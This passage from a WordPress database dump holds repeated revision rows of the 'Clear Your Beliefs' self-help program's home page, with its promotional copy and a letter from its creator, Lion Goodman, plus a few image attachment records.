Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 02:38:03', '2014-11-12 07:38:03', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1696, 2, '2014-11-12 11:19:24', '2014-11-12 16:19:24', '', 'iCreate new copy', '', 'inherit', 'closed', 'open', '', 'icreate-new-copy-2', '', '', '2014-11-12 11:19:24', '2014-11-12 16:19:24', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-app-box.jpg', 0, 'attachment', 'image/jpeg', 0),
(1697, 2, '2014-11-12 11:20:38', '2014-11-12 16:20:38', '', 'iClear-200x201-app-box', '', 'inherit', 'closed', 'open', '', 'iclear-200x201-app-box', '', '', '2014-11-12 11:20:38', '2014-11-12 16:20:38', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg', 0, 'attachment', 'image/jpeg', 0),
(1698, 2, '2014-11-12 11:22:13', '2014-11-12 16:22:13', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 8px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 11:22:13', '2014-11-12 16:22:13', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1699, 2, '2014-11-12 11:24:21', '2014-11-12 16:24:21', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center;margin-top: 8px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 11:24:21', '2014-11-12 16:24:21', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1700, 2, '2014-11-12 11:27:44', '2014-11-12 16:27:44', '', 'IClearIt-website_sml', '', 'inherit', 'closed', 'open', '', 'iclearit-website_sml-2', '', '', '2014-11-12 11:27:44', '2014-11-12 16:27:44', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml.png', 0, 'attachment', 'image/png', 0),
(1701, 2, '2014-11-12 11:28:28', '2014-11-12 16:28:28', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 8px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 11:28:28', '2014-11-12 16:28:28', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1702, 2, '2014-11-12 11:30:47', '2014-11-12 16:30:47', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top:10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 8px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 11:30:47', '2014-11-12 16:30:47', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1703, 2, '2014-11-12 12:09:56', '2014-11-12 17:09:56', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 8px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-12 12:09:56', '2014-11-12 17:09:56', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1704, 2, '2014-11-12 12:15:24', '2014-11-12 17:15:24', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top:10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 8px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 15px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and 